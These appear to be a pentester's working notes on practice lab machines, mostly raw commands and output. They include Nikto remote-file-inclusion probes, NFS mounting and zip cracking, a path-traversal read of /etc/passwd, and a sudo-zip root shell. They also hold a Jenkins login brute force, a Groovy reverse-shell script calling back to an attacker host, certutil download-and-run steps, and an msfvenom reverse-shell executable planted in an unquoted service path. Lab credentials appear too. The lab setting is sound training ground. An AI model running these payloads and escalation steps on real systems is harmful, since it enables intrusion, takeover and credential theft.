+ /index.php?includesdir=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?insPath=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?lang=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?language=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?language=en&main_page=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?lizge=http://blog.cirt.net/rfiinc.txt?&cmd=ls: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?lng=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?load=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?loadpage=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?main_tabid=1&main_content=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?may=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?middle=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?mode=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?mode=http://blog.cirt.net/rfiinc.txt?&cmd=: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?modpath=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?module=PostWrap&page=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?mosConfig_absolute_path=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?news7[\"functions\"]=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?news_include_path=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?open=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?option=com_custompages&cpage=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?page=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?page=http://blog.cirt.net/rfiinc.txt%00: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?page=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?pagehttp://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?page[path]=http://blog.cirt.net/rfiinc.txt?&cmd=ls: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?pagename=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?pageNikto=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?pager=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?pagina=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?path_to_folder=http://blog.cirt.net/rfiinc.txt?cmd=id: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?pg=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?pg=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?phpbb_root_path=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?plugin=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?principal=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?proMod=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?proMod=http://blog.cirt.net/rfiinc.txt?cmd: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?project=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?repinc=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?root_prefix=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?root_prefix=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?section=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?site=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?site_path=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?styl[top]=http://blog.cirt.net/rfiinc.txt??: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?template=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?templates_dir=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?theme=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?themepath=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?themesdir=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?this_path=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?txt=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?up=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?url=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?w=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?way=http://blog.cirt.net/rfiinc.txt??????????????: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ 8102 requests: 0 error(s) and 142 item(s) reported on remote host
+ End Time: 2024-07-24 02:00:04 (GMT-4) (27 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
driver: sqlite
databasename: bolt
username: bolt
password: I_love_java
bolt.db, size is 0
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.92.132:8080/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.92.132:8080/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
# [Status: 200, Size: 94539, Words: 4684, Lines: 1159, Duration: 77ms]
# [Status: 200, Size: 94540, Words: 4684, Lines: 1159, Duration: 90ms]
# Priority ordered case sensative list, where entries were found [Status: 200, Size: 94540, Words: 4684, Lines: 1159, Duration: 74ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 94539, Words: 4684, Lines: 1159, Duration: 76ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 94540, Words: 4684, Lines: 1159, Duration: 125ms]
# on atleast 2 different hosts [Status: 200, Size: 94540, Words: 4684, Lines: 1159, Duration: 124ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 94540, Words: 4684, Lines: 1159, Duration: 129ms]
# directory-list-2.3-medium.txt [Status: 200, Size: 94540, Words: 4684, Lines: 1159, Duration: 121ms]
dev [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 2ms]
# Copyright 2007 James Fisher [Status: 200, Size: 94540, Words: 4684, Lines: 1159, Duration: 520ms]
# [Status: 200, Size: 94540, Words: 4684, Lines: 1159, Duration: 556ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 94540, Words: 4684, Lines: 1159, Duration: 561ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 94540, Words: 4684, Lines: 1159, Duration: 569ms]
[Status: 200, Size: 94539, Words: 4684, Lines: 1159, Duration: 565ms]
# [Status: 200, Size: 94540, Words: 4684, Lines: 1159, Duration: 565ms]
[Status: 200, Size: 94540, Words: 4684, Lines: 1159, Duration: 950ms]
server-status [Status: 403, Size: 281, Words: 20, Lines: 10, Duration: 3ms]
:: Progress: [220560/220560] :: Job [1/1] :: 952 req/sec :: Duration: [0:00:31] :: Errors: 0 ::
rpcinfo -p 192.168.92.132
program vers proto port service
100000 4 tcp 111 portmapper
100000 3 tcp 111 portmapper
100000 2 tcp 111 portmapper
100000 4 udp 111 portmapper
100000 3 udp 111 portmapper
100000 2 udp 111 portmapper
100005 1 udp 47818 mountd
100005 1 tcp 52185 mountd
100005 2 udp 55192 mountd
100005 2 tcp 59307 mountd
100005 3 udp 56740 mountd
100005 3 tcp 45403 mountd
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
100227 3 tcp 2049 nfs_acl
100003 3 udp 2049 nfs
100227 3 udp 2049 nfs_acl
100021 1 udp 53462 nlockmgr
100021 3 udp 53462 nlockmgr
100021 4 udp 53462 nlockmgr
100021 1 tcp 43463 nlockmgr
100021 3 tcp 43463 nlockmgr
100021 4 tcp 43463 nlockmgr
showmount -e 192.168.92.132
Export list for 192.168.92.132:
/srv/nfs 172.16.0.0/12,10.0.0.0/8,192.168.0.0/16
- Create a temp directory
mkdir /mnt/dev - Mount it locally
mount -t nfs 192.168.92.132:/srv/nfs /mnt/dev - password protected file called
save.zip, we needapt install fcrackzip fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt save.zip, password isjava101mkdir /mnt/dev/temp,unzip /mnt/dev/save.zip -d /mnt/dev/tempcat todo.txt
cat /mnt/dev/temp/todo.txt
- Figure out how to install the main website properly, the config file seems correct...
- Update development website
- Keep coding in Java because it's awesome
jp
id_rsafile to connect to ssh- we try
ssh -i id_rsa [email protected], andbolt, doesn't work.
nmap --script ssh2-enum-algos -p 22 192.168.92.132
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-24 02:28 EDT
Nmap scan report for 192.168.92.132
Host is up (0.00075s latency).
PORT STATE SERVICE
22/tcp open ssh
| ssh2-enum-algos:
| kex_algorithms: (10)
| curve25519-sha256
| [email protected]
| ecdh-sha2-nistp256
| ecdh-sha2-nistp384
| ecdh-sha2-nistp521
| diffie-hellman-group-exchange-sha256
| diffie-hellman-group16-sha512
| diffie-hellman-group18-sha512
| diffie-hellman-group14-sha256
| diffie-hellman-group14-sha1
| server_host_key_algorithms: (5)
| rsa-sha2-512
| rsa-sha2-256
| ssh-rsa
| ecdsa-sha2-nistp256
| ssh-ed25519
| encryption_algorithms: (6)
| [email protected]
| aes128-ctr
| aes192-ctr
| aes256-ctr
| [email protected]
| [email protected]
| mac_algorithms: (10)
| [email protected]
| [email protected]
| [email protected]
| [email protected]
| [email protected]
| [email protected]
| [email protected]
| hmac-sha2-256
| hmac-sha2-512
| hmac-sha1
| compression_algorithms: (2)
| none
|_ [email protected]
MAC Address: 00:0C:29:B6:36:DD (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
- register on
http://192.168.92.132:8080/dev/index.php - go to https://www.exploit-db.com/exploits/48411 and copy
index.php?p=action.search&action=../../../../../../../etc/passwd
http://192.168.92.132:8080/dev/index.php?p=action.search&action=../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
jeanpaul:x:1000:1000:jeanpaul,,,:/home/jeanpaul:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
_rpc:x:107:65534::/run/rpcbind:/usr/sbin/nologin
statd:x:108:65534::/var/lib/nfs:/usr/sbin/nologin
Try /etc/shadow too, you never know.
ssh -i /mnt/dev/temp/id_rsa [email protected]
Enter passphrase for key '/mnt/dev/temp/id_rsa': I_love_java
Linux dev 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jun 2 05:25:21 2021 from 192.168.10.31
jeanpaul@dev:~$ whoami
jeanpaul
jeanpaul@dev:~$ sudo -l
Matching Defaults entries for jeanpaul on dev:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jeanpaul may run the following commands on dev:
(root) NOPASSWD: /usr/bin/zip
- Johntheripper can also brute force passphrase.
- Check for variants:
cat /usr/share/wordlists/rockyou.txt| grep I_love_java, nothing shows up. - Other commands to run once logged:
pwd,history,sudo -lto know the sudo user privileges without pwd - Use this technique:
https://www.hackingarticles.in/linux-for-pentester-zip-privilege-escalation/or search on gtfobinshttps://gtfobins.github.io/gtfobins/zip/#sudo
jeanpaul@dev:~$ touch raj.txt
jeanpaul@dev:~$ ls
raj.txt
jeanpaul@dev:~$ sudo zip 1.zip raj.txt -T --unzip-command="sh -c /bin/bash"
adding: raj.txt (stored 0%)
root@dev:/home/jeanpaul# whoami
root
root@dev:/home/jeanpaul# cd ../..
root@dev:/# ls
bin boot dev etc home initrd.img initrd.img.old lib lib32 lib64 libx32 lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinuz vmlinuz.old
root@dev:/# cd root/
root@dev:~# ls
flag.txt
root@dev:~# cat flag.txt
Congratz on rooting this box !
nmap -T4 -p- -A 192.168.92.133
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-25 01:06 EDT
Nmap scan report for 192.168.92.133
Host is up (0.0011s latency).
Not shown: 65523 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5040/tcp open unknown
7680/tcp open pando-pub?
8080/tcp open http Jetty 9.4.41.v20210516
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
|_http-server-header: Jetty(9.4.41.v20210516)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:7E:5B:8E (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=7/25%OT=135%CT=1%CU=43042%PV=Y%DS=1%DC=D%G=Y%M=000C
OS:29%TM=66A1DE33%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=100%TI=I%CI=I%
OS:II=I%SS=S%TS=U)OPS(O1=M5B4NW8NNS%O2=M5B4NW8NNS%O3=M5B4NW8%O4=M5B4NW8NNS%
OS:O5=M5B4NW8NNS%O6=M5B4NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=
OS:FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M5B4NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF
OS:=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%
OS:RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W
OS:=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
OS:U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%D
OS:FI=N%T=80%CD=Z)
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: 8h59m58s
|_nbstat: NetBIOS name: BUTLER, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:7e:5b:8e (VMware)
| smb2-time:
| date: 2024-07-25T14:09:55
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 1.14 ms 192.168.92.133
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 209.25 seconds
Notes
8080 Jetty 9.4.41.v20210516, jenkins login page, 403 on all subdirectories
5040
7680
135/tcp (msrpc)
139/tcp (netbios-ssn) & 445/tcp (microsoft-ds)
49664/tcp to 49670/tcp (msrpc)
apt install telnet
telnet 192.168.92.133 7680
Trying 192.168.92.133...
Connected to 192.168.92.133.
Escape character is '^]'.
- we use burpsuite intruder, and cluster bomb because we don't know username nor password.
- payload set 1 are usernames, payload set 2 are passwords.
- launch attack
- analyze the length of the responses, we detect that the right combination is
jenkins:jenkinsbecause we get a cookieJSESSIONID.3212a3e3=node0gxugk8f2xj3u1bdtqam5rxs440.node0.
POST /j_spring_security_check HTTP/1.1
Host: 192.168.92.133:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Origin: http://192.168.92.133:8080
Connection: keep-alive
Referer: http://192.168.92.133:8080/loginError
Cookie: JSESSIONID.3212a3e3=node0gxugk8f2xj3u1bdtqam5rxs440.node0
Upgrade-Insecure-Requests: 1
j_username=§admin§&j_password=§password§&from=&Submit=Sign+in
We can access /script now that we are in the dashboard.
- open a port on your kali machine:
nc -lvnp 4444 - run the following script (or use this tutorial):
String host="192.168.92.128";
int port=4444;
Process p=new ProcessBuilder("cmd.exe").redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
while(si.available()>0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
} catch (Exception e){}
};
p.destroy();
s.close();
systeminfo
10.0.19043
Hotfix(s): 5 Hotfix(s) Installed.
[01]: KB5020872
[02]: KB5000736
[03]: KB5021233
[04]: KB5020372
[05]: KB5001405
- download winpeas64.exe on your kali machine in a transfer folder (https://github.com/peass-ng/PEASS-ng/releases/latest)
- inside this folder, open a server with
python3 -m http.server 80 - navigate on the windows machines inside
c:\Users\butler,WiseCare365_5.6.7.568.exein downloads, usedirto see what's inside - run
certutil.exe -urlcache -f http://192.168.92.128/winpeas.exe winpeas.exe - run
winpeas.exe, lots of enum, but something interesting with Wise Care 365 (no quotes and space detected, unquoted service path: explanation). - in your kali machine, prepare the malware:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.92.128 LPORT=7777 -f exe > Wise.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
- relaunch your python server.
- go to
c:\Program Files (x86)\Wise>, then runcertutil -urlcache -f http://192.168.92.128/Wise.exe Wise.exe
whoami
nt authority\system
1 gb memory is enough, NAT for network.
- root:tcm to login
dhclient, thenip a
nmap -T4 -p- -A 192.168.92.137
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-26 06:57 EDT
Nmap scan report for 192.168.92.137
Host is up (0.00082s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 66:38:14:50:ae:7d:ab:39:72:bf:41:9c:39:25:1a:0f (RSA)
| 256 a6:2e:77:71:c6:49:6f:d5:73:e9:22:7d:8b:1c:a9:c6 (ECDSA)
|_ 256 89:0b:73:c1:53:c8:e1:88:5e:c3:16:de:d1:e5:26:0d (ED25519)
53/tcp open domain ISC BIND 9.11.5-P4-5.1+deb10u5 (Debian Linux)
| dns-nsid:
|_ bind.version: 9.11.5-P4-5.1+deb10u5-Debian
80/tcp open http nginx 1.14.2
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.14.2
MAC Address: 00:0C:29:CC:65:D4 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.82 ms 192.168.92.137
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.44 seconds
Notes
Linux (Kernel versions 4.15 to 5.8)
Port 22/tcp (SSH) OpenSSH 7.9p1 (Debian 10+deb10u2)
Port 53/tcp (DNS) ISC BIND 9.11.5-P4-5.1+deb10u5 (Debian Linux)
Port 80/tcp (HTTP) nginx/1.14.2, Webmaster: [email protected]
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.92.137/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.92.137/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
# directory-list-2.3-medium.txt [Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 5ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 1ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 5ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 2ms]
# [Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 6ms]
# Priority ordered case sensative list, where entries were found [Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 4ms]
# [Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 1ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 4ms]
# [Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 11ms]
# [Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 5ms]
# on atleast 2 different hosts [Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 8ms]
[Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 7ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 9ms]
# Copyright 2007 James Fisher [Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 10ms]
secret [Status: 200, Size: 209, Words: 31, Lines: 9, Duration: 5ms]
[Status: 200, Size: 652, Words: 82, Lines: 27, Duration: 7ms]
:: Progress: [220560/220560] :: Job [1/1] :: 4761 req/sec :: Duration: [0:00:44] :: Errors: 0 ::
/secret
OMG you got r00t !
Just kidding... search somewhere else. Directory busting won't give anything.
<This message is here so that you don't waste more time directory busting this particular website.>
- Alek
dnsrecon -r 127.0.0.0/24 -n 192.168.92.137 -d blah
[*] Performing Reverse Lookup from 127.0.0.0 to 127.0.0.255
[+] PTR blackpearl.tcm 127.0.0.1
[+] 1 Records Found
nano /etc/hostsand add192.168.92.137 blackpearl.tcm
